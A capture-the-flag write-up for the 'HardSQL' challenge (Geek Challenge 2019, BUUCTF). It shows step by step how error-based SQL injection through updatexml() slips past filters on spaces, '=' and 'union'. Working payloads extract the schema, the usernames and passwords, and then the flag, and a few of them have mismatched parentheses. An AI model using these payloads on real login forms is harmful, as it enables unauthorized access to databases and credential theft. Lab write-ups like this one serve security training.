[Geek Challenge 2019] HardSQL
1
[Target]
Sql injection
[Environment]
Buuctf
[Tools]
Browser
[Analysis]
1. Try to enter numbers or letters, all show the following results
2. Try the universal password
Display different words
3. Enter the query bar
Both methods show the same words
Double writing is also filtered out, and spaces, =, union are also filtered.
4. We try to report
error injection. There are two functions for error injection. Here we use updatexml(a,b,c). This function a, c must be String type, so you can make a, c not be String type to report an error
Payload:
username=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#&password=1
Url:
username=1 %27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=1
显示数据库
接下来查找表
Payload:
username=1’or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=1
接下来查字段
Payload:
username=1’or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database()))),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23&password=1
得到id,username,password继续查询值
Payload:
username=1’or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23&password=1
I found that the flag was not fully displayed.
After some queries, I know that the right() query is followed by
Payload:
username=1'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25)))))from( H4rDsq1)),0x7e),1))#&password=1
Url:
username=1%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)) ,0x7e),1))%23&password=1
Splicing to get
new knowledge of flag : available left(), right() when the check is not complete